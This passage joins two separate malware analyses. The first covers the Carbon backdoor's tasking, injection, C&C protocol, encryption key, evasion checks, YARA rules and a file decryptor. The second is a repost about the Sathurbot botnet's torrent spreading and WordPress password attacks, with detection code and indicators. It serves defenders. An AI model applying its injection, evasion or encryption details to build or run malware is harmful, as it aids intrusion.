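W = r"C:\Program Files\Windows Portable Devices"  # working folder from the page's .inf example
SAMPLE_CONFIG = r"""
[NAME]
object_id=
iproc = iexplore.exe,outlook.exe,msimn.exe,firefox.exe,opera.exe,chrome.exe
[TIME]
task_min = 20000
task_max = 30000
time2task=3600000
[CW_INET]
quantity = 2
address1 = doctorshand.org:80:/wp-content/about/
address2 = www.lasac.eu:80:/credit_payment/url/
"""
SAMPLE_TASKS = [  # constructed; Nls holds tasks, 0208 results and logs (3.7x layout)
    f"1|{W}\\Nls\\t1.bin|{W}\\Nls\\t1.cfg|{W}\\0208\\r1.dat|{W}\\0208\\l1.dat",
    f"2|{W}\\Nls\\t2.bin|{W}\\Nls\\t2.cfg|{W}\\0208\\r2.dat|{W}\\0208\\l2.dat|3",
]
SAMPLE_LOG = [  # the three lines quoted on the page
    "20/02/17|12:48:24|8hTdJtUBB57ieReZAOSgUYacts|s|OPER|New object ID generated '8hTdJtUBB57ieReZAOSgUYacts'|",
    "20/02/17|12:48:24|8hTdJtUBB57ieReZAOSgUYacts|s|ST|3/81|0|",
    "20/02/17|12:48:24|8hTdJtUBB57ieReZAOSgUYacts|s|START OK",
]
```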

P2P

Like Uroburos/Snake, Carbon can dispatch tasks to other computers from the same network via named pipe or TCP. It is useful to be able to dispatch and execute tasks on computers that do not have Internet access.

Communication channels

Uroburos used several types of communication transports that can be categorized as follows:

  • type 1: TCP
  • type 2: enc, np, reliable, frag, m2b, m2d
  • type 3: t2m
  • type 4: UDP, doms, domc

Carbon uses a reduced number of communication channels:

  • type 1: TCP, b2m
  • type 2: np, frag, m2b

Data sent to peers are usually fragmented and transported either over TCP or via a named pipe. If, for example, fragmented data are sent from one computer to another over a named pipe, an object “frag.np” is set up. In this case the parent class “frag” constructor is called, followed by a call to the constructor of the subclass “np”.

For each object there is a structure composed of several handlers: initialize communication, connect (to a pipe / IP address), read data, send data, etc.

How a task is forwarded to another computer

Several steps are performed to send data from one computer to another:

  • a communication channel is created (frag.np or frag.tcp object) with a specific named pipe / ip address
  • options are given to the object communication (for example : the fragment’s size, information about the peer etc.)
  • connection to the peer
  • an authentication step is performed between the host and the peer:
    • there is a handshake process where the host is sending the “magic” value “A110EAD1EAF5FA11” and expects to receive “C001DA42DEAD2DA4” from the peer
    • a command “WHO” is sent to the peer where the host sends the victim uuid and expects to receive the same uuid
  • if the authentication was successful, the data are sent to the peer

All communication between the host and the peer is encrypted with CAST-128.

Note that this P2P feature is also implemented in the communication DLL.

Plugins

This malware supports additional plugins to extend its functionalities.

In the configuration file, there is a section named “PLUGINS”. It might not exist when the configuration file is dropped from the loader resources but this file can be updated by the malware. The section “PLUGINS” contains a line formed this way:

  • %plugin_name%=%enabled%|%mode%[:%username%:%password%]|%file_path%

%file_path% can be either the path to a PE file or to a file containing a command line to be executed. %enabled% is a string used to determine whether the plugin has to be executed; if so, its value is “enabled”.

The attribute %mode% is used to control the context in which to execute the PE file/command line. It can be either:

  • 1 = execution with the current user's privileges in the current process context through CreateProcess().
  • 2 = execution as the user specified in the configuration (:%username%:%password% attributes); the token of this specific user is retrieved through the LogonUserAs() function.
  • 3 = execution in the security context of the user represented by the “explorer.exe” token (the token of the “explorer.exe” process is duplicated and passed to the CreateProcessAsUser() function).
  • 4 = similar to 3, but the environment variables of the user represented by the “explorer.exe” token are also retrieved and passed to CreateProcessAsUser().

If it is a PE file:

  • the file is loaded into the malware process memory
  • the module is parsed to check if it is a DLL
  • if the module is a DLL and exports a function “ModStart” (since Carbon 3.77) or “ModuleStart” (for older versions of Carbon), a new thread is created to execute this function.
  • if the module is not a DLL but a valid PE, it is executed from the entry point.

Injection of the communication library into remote processes

The library that is used to communicate with the C&C server is injected into remote processes. In order to know where to inject this DLL, the configuration file is parsed. The section “[NAME]” contains a field “iproc” containing a list of processes that can legitimately communicate to Internet.

Example:
[NAME]
iproc = iexplore.exe,outlook.exe,msimn.exe,firefox.exe,opera.exe,chrome.exe

For each process on the list that is running on the system, if its parent process name is either “explorer.exe” or “ieuser.exe”, the DLL will be injected into this process.

The process injection technique is a classic one:

  • the functions “CreateToolHelp32Snapshot / Module32FirstW / Module32NextW” are used to retrieve the base address of the module “kernel32.dll”
  • the module EAT is parsed to get the address of the function “LoadLibraryW”
  • the privilege “SeDebugPrivilege” is enabled for the current process
  • memory is allocated into the remote process and the library path is written into it
  • NtCreateThreadEx or CreateRemoteThread (if the address of the first function cannot be retrieved) is called to execute LoadLibraryW, which loads the DLL into the memory of the remote process

Communication library

The following analysis is based on the version 4.x of msximl. This component may have changed in the latest versions.

Configuration fetching

Besides the code in the “Configuration fetching” thread from the orchestrator (which is similar), a field “sethttp1” is retrieved from the [TRANSPORT] section.

If this value is set, HTTP 1.1 will be used for future connections.

Tasks execution

The tasks are retrieved from the C&C server.

The tasks to be executed by the communication library are listed in the file “b9s3coff.ax” (for Carbon v3.7x) or “cifrado.xml” (for Carbon v3.8x).

Each line of this file is composed in the following way:

  • task_id | task_filepath | task_config_filepath | task_result_filepath | task_log_filepath

The task file and its config are decrypted (CAST-128) and the task executed. Some options are retrieved from the Carbon configuration file: “time2task” sets a timeout for the task execution (1 hour by default), while “task_min” and “task_max” are used to wait a random time between the execution of the tasks on the task list (the random delay is chosen between “task_min” and “task_max”). These parameters come from the section [TIME].

If the task is a valid DLL file, it is loaded in the current process memory and a new thread is created to execute its “start” export. Otherwise, it is probably a command to execute. In this case, the task configuration file is parsed. Like the Carbon configuration file, the task configuration file is formatted as a Windows “inf” file and should contain a section [CONFIG] with the following parameters:

  • [CONFIG]
    • NAME (“cmd.exe” by default)
    • ARG
    • RESULT (“stdout” by default)
    • COMPRESSION (“yes” by default)
    • DELETE (“no” by default)

The command with its arguments is executed through the CreateProcess() function and the results are stored in the %task_result_filepath% file if the RESULT option is not set to “stdout”, while errors or additional info are added to the task logfile.

If the option RESULT is set to stdout:

  • the result task file is deleted and the task execution output is written to the log task file
  • the line “task_id | “1” | task_log_filepath | object_id” is added at the end of the file “C_56743.NLS” (Carbon 3.7x) or “dsntype.gif” (Carbon 3.8x)

Otherwise:

  • the task execution output is written to the task result file and the errors / additional info to the task logfile
  • the line “task_id | “2” | task_log_filepath | task_result_filepath | object_id” is added at the end of the file “C_56743.NLS” (Carbon 3.7x) or “dsntype.gif” (Carbon 3.8x)

In both cases, the same line as written into “C_56743.NLS” is also written into the field “run_task” of the Carbon configuration file. It might be intended as a way for the malware operators to know which task was executed last when the configuration file is sent to the C&C server (see “Configuration file backup”).

Log rotation

The logfile is backed up and sent to the C&C server periodically (by default this is done every two hours).

Like the backup of the configuration file, this action is performed only during specific times of the day: the log rotation is performed only when the current local time falls within the range defined in the configuration file.

The fields “wh_min” and “wh_max” are retrieved from the [TIME] section of the configuration file (by default: 8 and 20). The thread will execute the code only if the current hour of the day is between %wh_min% and %wh_max%.

If there is a value for the attribute “timestop” from the [TIME] section (which looks like “wDay:wMonth:wYear:wHour:wMinute”), the thread will execute the code only after this specific datetime.

The attributes “lastsend” and “logperiod” from the [LOG] section specify the delay between backing up and sending the log to the C&C server (by default: every two hours).

A temporary file with a random name prefixed with “~D” is created in the folder “0208” (for Carbon v3.7x) or “1033” (for Carbon v3.8x). The logfile content is copied into this new file, which is then compressed with Bzip2 and encrypted (CAST-128).

A new line is added at the end of the file “C_56743.NLS” (for Carbon v3.7x) or “dsntype.gif” (for Carbon v3.8x):

  • “10|1|%s|%s”
    • 1st field: an ID to identify the file as a logfile
    • 2nd field: 1 (file to be sent to the C&C server)
    • 3rd field: the temp file path
    • 4th field: the victim uuid

Last but not least, the attribute “lastsend” is updated with the current time and the original logfile is deleted.

Communication with the C&C server

The code of this thread is used to retrieve new tasks from the C&C server, to send new files to the server (the files listed in the file “C_56743.NLS” / “dsntype.gif”) and to send the new tasks to the orchestrator.

First request

A random C&C server address is chosen from the ones in the section “CW_INET”. If the port and HTTP resource path are not specified, the default is to use port 80 and “/javascript/view.php”.

A user agent is set up in the following way:

  • the version of Internet Explorer is retrieved through the registry key: “HKLM\Software\Microsoft\Internet Explorer\Version” and is concatenated to the string “Mozilla/4.0 (compatible; MSIE %d.0; ”
    • example: “Mozilla/4.0 (compatible; MSIE 8.0.6001.18702.0;”
  • concatenate the previous string with the OS major/minor version values (through GetVersionExA())
    • “Mozilla/4.0 (compatible; MSIE 8.0.6001.18702.0; Windows NT 5.1; Trident/4.0”
  • enumerate the values under the key “HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform”, concatenate each value to the previous string and then append a closing parenthesis.
    • example: “Mozilla/4.0 (compatible; MSIE 8.0.6001.18702.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; Media Center PC 6.0; SLCC2)”

The field “trans_timemax” from the section [TIME] is retrieved. It is used to set the timeout for internet requests (through InternetSetOption()). It has a value of 10 minutes by default.

A first GET request is performed on the root page of the C&C web server to check that the host is alive. If no packet capture is running on the system, a new request is done on the C&C server to check if new tasks are available. A “PHPSESSID” cookie is added to the request with the victim uuid as its value. A header “Referer” is added as well and set to the C&C server URL.

The malware is expecting to get an answer to the GET request similar to:

  • <input name=”%name%” value=”%data_in_b64%”>

If the field “value” contains something, a new task is available.

Send data to the server

If the file “C_56743.NLS” / “dsntype.gif” is not empty, there are data to be sent to the C&C server. The file is parsed and the last line is retrieved. It contains details about the data to be sent. A data blob is built and each of the following fields is encrypted with CAST-128:

  • id | val | tmp_filesize | tmp_content | [OPTIONAL (if val == 2) tmp2_filesize | tmp2_content] | len_object_id | object_id
    • id = the type of data to send to the C&C server, it can be:
      • 10: log backup
      • 11: configuration file
      • 20: a cryptographic key
      • otherwise: an id associated to a task, it can be the result of a task or an error log in the case of task execution failure
    • val = 1 if there is only one file to send, 2 if there are two files
    • object_id = the victim uuid

If the field “dtc” from the section [CRYPTO] of the configuration file is set to 0, this whole blob is base64 encoded and sent to the C&C server through a POST request.

Otherwise, another layer of encryption is used. In this case, the data blob is signed and a random 3DES key is used to encrypt it. Because the 3DES key is randomly generated and the server needs it to decrypt the data, the key is encrypted with the server public key. The server key is retrieved from the field “publicc” of the section [CRYPTO] from the configuration file.

This new blob (encrypted_key | signature_data | encrypted data) is encoded in base64 and sent to the C&C server through a POST request.

In order to avoid detection based on the data size sent in a request, the blob can be fragmented into several packets. An option in the configuration file (“post_frag” in the section [TRANSPORT]) defines whether the blob will be fragmented or sent in only one POST request.

If this option is set to “yes”, the blob is divided into several fragments of a specific size. This size comes from another field in the configuration file: “post_frag_size”.

An additional header will be added to the request:

  • "Content-Range: bytes %u-%u/%u; id=%u\r\n", i, i+(fragment_size-1), data_size, task_id

If the option http11 is set, a specific header is added as well:

  • “Expect: 100-continue\r\n”

For each fragment sent, the fields “post_frag_size” and “pfslastset” from the config file (section [CW_INET_RESULTS]) are updated with the fragment size and the timestamp.
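As an added example (not code from the report), a small Python parser over constructed HTTP requests that flags the two request-side indicators described above: a POST carrying a Content-Range header whose byte range is followed by an "id=" task number, and a PHPSESSID cookie holding a UUID; the host name, task id and sizes are placeholders.

```python
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# Carbon's fragment header: "Content-Range: bytes %u-%u/%u; id=%u". Content-Range
# is normally a *response* header, so its presence on a POST request is itself
# unusual; the trailing "id=" task parameter is not part of standard HTTP at all.
CONTENT_RANGE_RE = re.compile(
    r"^content-range:\s*bytes\s+(\d+)-(\d+)/(\d+)\s*;\s*id=(\d+)\s*$", re.I)
# PHP's own session ids are plain alphanumerics; Carbon stores the victim UUID there.
UUID_RE = re.compile(
    r"^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$", re.I)


def analyse_request(raw: str) -> List[str]:
    """Return the Carbon-style indicators found in one raw HTTP request (request line + headers)."""
    lines = raw.strip().splitlines()
    method = lines[0].split(" ", 1)[0].upper()
    findings = []
    for line in lines[1:]:
        m = CONTENT_RANGE_RE.match(line)
        if m and method == "POST":
            start, end, total, task_id = (int(g) for g in m.groups())
            findings.append(f"fragmented POST: bytes {start}-{end} of {total}, task id {task_id}")
        elif line.lower().startswith("cookie:"):
            for cookie in line.split(":", 1)[1].split(";"):
                name, _, value = cookie.strip().partition("=")
                if name == "PHPSESSID" and UUID_RE.match(value):
                    findings.append(f"PHPSESSID holds a UUID: {value}")
    return findings


def fragment_coverage(requests: List[str]) -> Dict[int, Tuple[int, int]]:
    """Per task id, how many distinct bytes of the declared total were seen across fragments.

    A task whose fragments do not add up to the total was cut off or is still in flight.
    """
    seen: Dict[int, set] = defaultdict(set)
    totals: Dict[int, int] = {}
    for raw in requests:
        for line in raw.strip().splitlines()[1:]:
            m = CONTENT_RANGE_RE.match(line)
            if m:
                start, end, total, task_id = (int(g) for g in m.groups())
                seen[task_id].update(range(start, end + 1))
                totals[task_id] = total
    return {tid: (len(seen[tid]), totals[tid]) for tid in totals}


# Constructed sample traffic: a 2400-byte blob sent as three fragments of at most
# 1000 bytes (post_frag_size = 1000) for task 17, against a placeholder C&C host.
SAMPLE_REQUESTS = [
    "POST /feed.php HTTP/1.1\r\nHost: c2.example\r\n"
    "Cookie: PHPSESSID=3f2504e0-4f89-11d3-9a0c-0305e82c3301\r\n"
    "Referer: http://c2.example/\r\n"
    f"Content-Range: bytes {i}-{min(i + 999, 2399)}/2400; id=17\r\n\r\n"
    for i in (0, 1000, 2000)
]
```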

Get new tasks

New tasks are retrieved from the C&C server by parsing the html page. The malware expects to find the html tag <input> in the page with a base64 encoded blob in its “value” attribute. Once decoded, this blob contains:

  • an encrypted block of 128 bytes that contains a structure “PUBLICKEYSTRUC” followed by a cryptographic key (probably a 3DES key)
  • signature data (128 bytes) to verify the integrity of the next block
  • a block of encrypted data that contains the task

The malware uses an RSA private key (retrieved from the field “keypair” from the section [CRYPTO] of the configuration file) to decrypt the first block and then uses the freshly decrypted key to decrypt the third block. This block of data can be either:

  • a task to be executed[6]
    • the data are decrypted and stored in a few temporary files: the task (a command or a PE file) and its configuration file in the “Nls” folder, and the output files (the file that will contain the task results and the logfile) in the folder “0208” (“0409” and “1033” respectively for Carbon v3.8x)
    • task_id | task_filepath | task_config_filepath | task_result_filepath | task_log_filepath
    • this line is appended to the beginning of the file “b9s3coff.ax” (cifrado.xml on v3.8x)
  • a task to be executed by the orchestrator[7]
    • the data are decrypted and stored in a few temporary files (the task, its configuration etc.) in the “Nls” and “0208” folders (or “0409” and “1033” for Carbon v3.8x)
    • depending on the content of the data, one of these lines will be added to the beginning of the file “a67ncode.ax” (encodebase.info on v3.8x)
      • task_id | task_filepath | task_config_filepath | task_result_filepath | task_log_filepath
      • task_id | task_filepath | task_config_filepath | task_result_filepath | task_log_filepath | execution_mode | username | password
      • task_id | task_filepath | task_config_filepath | task_result_filepath | task_log_filepath | execution_mode
  • a new RSA server public key
    • in this case, the configuration file is updated with the new key encoded in base64 (field publicc)
  • data to be sent to an instance of Carbon running in another computer in the same network
    • the data can contain a specific IP address and port, a named pipe, or a named pipe with a username and password.
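As an added example (not the report's code), a Python parser for the task layout just described: it pulls the base64 value out of the page's <input> tag, splits the decoded blob into the 128-byte key block, the 128-byte signature and the encrypted task, and names the fields of the decrypted pipe-separated task lines by their field count. The sample page and file paths are constructed placeholders; real blobs carry ciphertext in all three parts.

```python
import base64
import re
from dataclasses import dataclass
from typing import Dict, Optional

# The C&C page carries the task in an <input> tag: <input name="..." value="<base64>">
INPUT_RE = re.compile(r'<input\s+name="([^"]*)"\s+value="([^"]*)"\s*/?>', re.I)
KEY_BLOCK_LEN = 128  # RSA-encrypted PUBLICKEYSTRUC + session key
SIG_BLOCK_LEN = 128  # signature over the encrypted task block


@dataclass
class TaskBlob:
    name: str
    encrypted_key: bytes   # decrypted with the "keypair" RSA private key
    signature: bytes       # checked against the block that follows
    encrypted_task: bytes  # decrypted with the session key from the first block


def extract_task_blob(html: str) -> Optional[TaskBlob]:
    """Split the base64 <input value> into its three blocks; None when no task is pending."""
    m = INPUT_RE.search(html)
    if m is None or not m.group(2):
        return None                     # empty "value": nothing to do
    raw = base64.b64decode(m.group(2), validate=True)
    if len(raw) <= KEY_BLOCK_LEN + SIG_BLOCK_LEN:
        raise ValueError("blob too short to hold key block, signature and task")
    return TaskBlob(m.group(1), raw[:KEY_BLOCK_LEN],
                    raw[KEY_BLOCK_LEN:KEY_BLOCK_LEN + SIG_BLOCK_LEN],
                    raw[KEY_BLOCK_LEN + SIG_BLOCK_LEN:])


# Field layouts of the pipe-separated lines written to the task queue files,
# keyed by field count; the 5-field form is used by both queue files.
TASK_LINE_FIELDS = {
    5: ("task_id", "task_filepath", "task_config_filepath",
        "task_result_filepath", "task_log_filepath"),
    6: ("task_id", "task_filepath", "task_config_filepath",
        "task_result_filepath", "task_log_filepath", "execution_mode"),
    8: ("task_id", "task_filepath", "task_config_filepath",
        "task_result_filepath", "task_log_filepath", "execution_mode",
        "username", "password"),
}


def parse_task_line(line: str) -> Dict[str, str]:
    """Name the fields of a decrypted task line; raises on a layout the report does not list."""
    fields = line.rstrip("\r\n").split("|")
    names = TASK_LINE_FIELDS.get(len(fields))
    if names is None:
        raise ValueError(f"unexpected field count {len(fields)}")
    return dict(zip(names, fields))


# Constructed sample page: 128 bytes of 0x01 (key block), 128 bytes of 0x02 (signature),
# then a placeholder task payload.
SAMPLE_BLOB = b"\x01" * KEY_BLOCK_LEN + b"\x02" * SIG_BLOCK_LEN + b"<encrypted task bytes>"
SAMPLE_PAGE = '<html><body><input name="task" value="%s"></body></html>' % (
    base64.b64encode(SAMPLE_BLOB).decode())
EMPTY_PAGE = '<html><body><input name="task" value=""></body></html>'
```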

Check Internet availability

Each hour, the internet connection is checked. A first check is done by calling the function InternetAttemptConnect(). If it works, another test is done by sending HTTP GET requests to the following websites:

  • www.google.com
  • www.yahoo.com
  • www.bing.com
  • update.microsoft.com
  • windowsupdate.microsoft.com
  • microsoft.com

An event is used to notify the other threads in case of the loss of Internet access.

Configuration file backup

Similar to the logfile, the configuration file is also periodically backed up and sent to the C&C server. The thread executes the code in a specific range of time (between 8h and 20h by default)[8].

The value “configlastsend” is retrieved from the section [TIME] of the configuration file. If the config file was last sent more than a month ago, it is copied into a temporary file with a random name prefixed by “~D” in the folder “208” (for Carbon v3.7x) or “1033” (for Carbon v3.8x). This file is then encrypted with the CAST-128 algorithm.

To notify the thread that communicates with the C&C server that a new file is ready to be sent, the following line is appended to the file “C_56743.NLS” (for Carbon v3.7x) or “dsntype.gif” (for Carbon v3.8x):

  • “11|1|%s|%s”
    • 1st field: an ID to identify the file as a config file
    • 2nd field: 1 (file to be sent to the C&C server)
    • 3rd field: the temp filepath
    • 4th field: the victim uuid

Last but not least, the attribute “configlastsend” is updated with the current time.

Additional Notes

Calling API functions

The base addresses of the modules of interest are retrieved either by parsing the PEB or (if the modules are not loaded into the process memory) by loading the needed files from disk into memory and parsing their headers to get their base addresses.

Once the base addresses are retrieved, the PEB is walked again and the field “LoadCount” from the structure LDR_DATA_TABLE_ENTRY is checked. This value is used as a reference counter, to track the loading and unloading of a module.

If “LoadCount” is positive, the module EAT is parsed to get the needed function address.

Encryption

The module and function names are encrypted (at least since v3.77; it was not the case in v3.71) in a simple way: a logical shift of 1 bit is applied to each character.

The process names are encrypted as well, by XOR’ing each character with the key 0x55 (for Carbon v3.7x, at least since v3.77) or with the key 0x77 for Carbon v3.8x.

With only a few exceptions, each file in the Carbon working directory is encrypted with the CAST-128 algorithm in OFB mode. The same key and IV are used from version 3.71 until version 3.81:

  • key = “\x12\x34\x56\x78\x9A\xBC\xDE\xF0\xFE\xFC\xBA\x98\x76\x54\x32\x10”
  • IV = “\x12\x34\x56\x78\x9A\xBC\xDE\xF0”

Check if packet capture is running

Before communicating with the C&C server or with other computers, the malware ensures that none of the most common packet capture software is running on the system:

  • TCPdump.exe
  • windump.exe
  • ethereal.exe
  • wireshark.exe
  • ettercap.exe
  • snoop.exe
  • dsniff.exe

If any of these processes are running, no communication will be done.

Carbon IoCs are also available on ESET’s GitHub repository: https://github.com/eset/malware-ioc/tree/master/turla

Appendices

Yara rules

import "pe"

rule generic_carbon
{
    strings:
        $s1 = "ModStart"
        $s2 = "ModuleStart"
        $t1 = "STOP|OK"
        $t2 = "STOP|KILL"
    condition:
        (uint16(0) == 0x5a4d) and (1 of ($s*)) and (1 of ($t*))
}

rule carbon_metadata
{
    condition:
        (pe.version_info["InternalName"] contains "SERVICE.EXE" or
         pe.version_info["InternalName"] contains "MSIMGHLP.DLL" or
         pe.version_info["InternalName"] contains "MSXIML.DLL")
        and pe.version_info["CompanyName"] contains "Microsoft Corporation"
}

Carbon files decryptor/encryptor

carbon_tool.py

#!/usr/bin/env python3

from Crypto.Cipher import CAST  # pycryptodome
import sys
import argparse


def main():
    parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter)
    parser.add_argument("-e", "--encrypt", help="encrypt carbon file", required=False)
    parser.add_argument("-d", "--decrypt", help="decrypt carbon file", required=False)

    try:
        args = parser.parse_args()
    except IOError as e:
        parser.error(e)
        return 0

    if len(sys.argv) != 3:
        parser.print_help()
        return 0

    # Key and IV shared by every Carbon version from 3.71 to 3.81
    key = b"\x12\x34\x56\x78\x9A\xBC\xDE\xF0\xFE\xFC\xBA\x98\x76\x54\x32\x10"
    iv = b"\x12\x34\x56\x78\x9A\xBC\xDE\xF0"

    cipher = CAST.new(key, CAST.MODE_OFB, iv)

    if args.encrypt:
        with open(args.encrypt, "rb") as f:
            plaintext = f.read()
        # pad to a multiple of the 8-byte CAST block size with NUL bytes
        plaintext += b"\x00" * (-len(plaintext) % 8)
        data = cipher.encrypt(plaintext)
        with open(args.encrypt + "_encrypted", "wb") as f:
            f.write(data)
    else:
        with open(args.decrypt, "rb") as f:
            ciphertext = f.read()
        ciphertext += b"\x00" * (-len(ciphertext) % 8)
        data = cipher.decrypt(ciphertext)
        with open(args.decrypt + "_decrypted", "wb") as f:
            f.write(data)


if __name__ == "__main__":
    main()

Open Source documentation

Carbon footprint

Table 2 – Carbon sample hashes
Table 3 – C&C server addresses (hacked websites used as the 1st level of proxies)
Notes
5. two hours by default, but the waiting time depends on the value of the field “logperiod” from the “LOG” section of the configuration file
6. check “Tasks execution” part for more details
7. check “Orchestrator / Tasks execution” part for more details
8. depending on the config file; check “Log rotation” for the details

中国骇客云 (China Hacker Cloud): Sathurbot: distributed WordPress password attack

This article looks at the current ecosystem of the Sathurbot backdoor trojan, in particular its use of torrents as a delivery medium and its distributed brute-forcing of WordPress administrator accounts.

Torrent downloader

Want to download a movie or software without paying? There may be risks involved. It can easily happen that your favourite search engine returns torrent links on sites that normally have nothing to do with file sharing. They may, however, be running WordPress and have been compromised.

Some examples of search results:

Clicking those links leads to the following pages (note that some even use HTTPS):

All the movie sub-pages lead to the same torrent file, and all the software sub-pages lead to another torrent file. When you start torrenting in your favourite BitTorrent client, you will find that the file is well seeded and therefore appears legitimate. If you download the movie torrent, its content is a file with a video extension accompanied by an apparent codec pack installer and an explanatory text file. The software torrent contains an apparent installer executable and a small text file. The purpose of both is to get the victim to run the executable, which loads the Sathurbot DLL.

When you run it, you get a message like this:

While you are considering your options, bad things start happening in the background. You have just become a bot in the Sathurbot network.

Backdoor and downloader

On start-up, Sathurbot retrieves its C&C with a DNS query. The response is a DNS TXT record. Its string value is decrypted to give the C&C domain name used for status reporting, task retrieval and download links for other malware.

Sathurbot can update itself and download and start other executables. We have seen variants of Boaxxe, Kovter and Fleercivet, but this is not necessarily an exhaustive list.

Sathurbot then reports its successful installation, together with a listening port, to the C&C. It reports to the C&C periodically that it is alive and well, and waits for additional tasks.

Web crawler

Sathurbot comes with some 5,000-plus basic generic words. These are combined at random into 2-4 word phrases used as query strings for the Google, Bing and Yandex search engines.

From the web page at each of the search result URLs, a random 2-4 word text chunk is selected (this time it may be more meaningful, since it comes from real text) and used for the next round of search queries.

Finally, the domain names are harvested from the second set of search results (the third page).

The extracted domains are then probed to find out whether they were created with the WordPress framework. The trick is to check the response to the URL http://[domain_name]/wp-login.php

Subsequently, the root page of the domain is fetched for the presence of other frameworks. In other words, they are also interested in: Drupal, Joomla, PHP-Nuke, phpFox and DedeCMS.

At start-up, or at certain intervals, the harvested domains are sent to the C&C (a different domain than the hard-coded one used for the backdoor).

Distributed WordPress password attack

The client now gets a list of domains and access credentials (in the format login:password@domain) to probe for passwords. Different bots in the Sathurbot botnet try different login credentials for the same site. Each bot only tries a single login per site and then moves on. This design helps ensure that no bot gets its IP address blacklisted by any targeted site and that it can revisit the site in the future.

In our testing, lists of 10,000 items to probe were returned by the C&C.

For the attack itself, the XML-RPC API of WordPress is used. In particular, the wp.getUsersBlogs API is abused. A typical request looks like:

Probing the credentials of a number of domains is shown in the sequence below:

The responses are evaluated and the results posted to the C&C.
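As an added example (not from the original article), a small detector over constructed web-server access-log lines that separates the one-login-per-bot pattern described above (many distinct source IPs, one or two POSTs each against xmlrpc.php or wp-login.php) from an ordinary single-source brute force; the IP addresses and timestamps are constructed documentation values.

```python
import re
from collections import Counter, defaultdict
from typing import Dict, List

# Apache/nginx "combined" access-log line: source IP, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)')
# Endpoints Sathurbot touches: wp-login.php while probing, xmlrpc.php (wp.getUsersBlogs) while attacking.
WATCHED_PATHS = {"/wp-login.php", "/xmlrpc.php"}


def request_counts(lines: List[str]) -> Dict[str, Counter]:
    """POST requests per source IP, grouped by watched path."""
    counts: Dict[str, Counter] = defaultdict(Counter)
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m.group("method") != "POST":
            continue
        path = m.group("path").split("?", 1)[0]
        if path in WATCHED_PATHS:
            counts[path][m.group("ip")] += 1
    return counts


def distributed_sources(lines: List[str], min_sources: int = 5,
                        max_per_source: int = 2) -> Dict[str, int]:
    """Paths hit by many distinct IPs that each try only once or twice.

    That is the one-login-per-bot pattern; a single IP hammering wp-login.php is
    the ordinary brute force that per-IP rate limits already catch.
    """
    flagged = {}
    for path, per_ip in request_counts(lines).items():
        if len(per_ip) >= min_sources and max(per_ip.values()) <= max_per_source:
            flagged[path] = len(per_ip)
    return flagged


# Constructed sample log (documentation IP ranges, not real sources).
SAMPLE_LOG = [
    # six different sources, one xmlrpc.php attempt each
    *(f'198.51.100.{n} - - [10/Apr/2017:12:00:{n:02d} +0000] "POST /xmlrpc.php HTTP/1.1" 200 512'
      for n in range(1, 7)),
    # one source retrying wp-login.php ten times: classic, not distributed
    *(f'203.0.113.9 - - [10/Apr/2017:12:01:{n:02d} +0000] "POST /wp-login.php HTTP/1.1" 200 3100'
      for n in range(10)),
    # an ordinary visitor
    '192.0.2.5 - - [10/Apr/2017:12:02:00 +0000] "GET /index.php HTTP/1.1" 200 8000',
]
```

Access logs do not record the XML-RPC method name (wp.getUsersBlogs travels in the POST body), so confirming the method needs a WAF or application-level log.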

Torrent client and seeder

The bot has the libtorrent library integrated, and one of its tasks is to become a seeder: a binary file is downloaded, a torrent is created, and it is seeded.

BitTorrent bootstrap

Completing the cycle from leecher to involuntary seeder

Note: not every bot in the network performs all the functions; some are just web crawlers, some just attack the XML-RPC API, and some do both. Also, not every bot seems to be seeding torrents.

Impact

The attempts on /wp-login.php described above from a multitude of users, even on sites not hosting WordPress, are a direct impact of Sathurbot. Many site administrators observe this and wonder why it happens. In addition, WordPress sites can see potential attacks on wp.getUsersBlogs in their logs.

Judging from logs, system artefacts and files, the botnet consists of over 20,000 infected computers and has been active since at least June 2016.

Occasionally, we have seen torrent links sent via e-mail as well.

Detection

Web administrators: check the server for unknown sub-pages and/or directories. If they contain any references to torrent download offers, check the access logs for attacks and possible backdoors.

Users: run Wireshark with the filter http.request with no browser open and look for excess requests such as to /wp-login.php and/or POST /xmlrpc.php. Also check for the files or registry entries listed in the IOC section below.

ESET users are protected from this threat on multiple levels.

Removal

Web administrators: change passwords, delete sub-pages that do not belong to the site, and optionally wipe and restore the site from a backup.

Users: use a third-party file manager to locate the suspect DLLs (note that the files and directories have the hidden attribute set), open a process manager or Task Manager, kill explorer.exe and/or rundll32.exe, delete (quarantine) the affected DLLs, and reboot.

Note: this removes only Sathurbot and not any other malware it may have downloaded.

Also consider a full-featured anti-malware product, or at least an online scanner.

Prevention

Web administrators: if a normally operating site does not need the XML-RPC API, it is recommended to disable it, and to use complex passwords.

Users: avoid running executables downloaded from sources other than reputable developers, and avoid downloading files from sites not designed primarily as file-sharing sites.

IOC

Currently, we have observed Sathurbot installed as:

\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll

\ProgramData\Microsoft\Performance\TheftProtection\TheftProtection.dll

\ProgramData\Microsoft\Performance\Monitor\SecurityHelper.dll

\Users\*****\AppData\Local\Microsoft\Protect\ProtectHost.dll

It runs inside the rundll32.exe or explorer.exe process, which locks and edits files and registry keys. It comes in both x32 and x64 bit versions.

Sub-folders of the above (containing torrent files and seeded files):
\securitycache\cache\summary
\securitycache\cache\rules
\securitycache\date
\securitycache\zepplauncher.mif – contains the DHT nodes
\temp\

%APPDATA%\syshashtable directory – contains files representing hashes of the accessed domains
%APPDATA%\syshashtable\syshashinfo.db – the collected interesting domains, including framework information

Samples (SHA-1)

Installers:
Sathurbot DLLs:

Additional payloads:


Related domains


Registry values

You may need to use a third-party tool; Windows Regedit may not even display these.

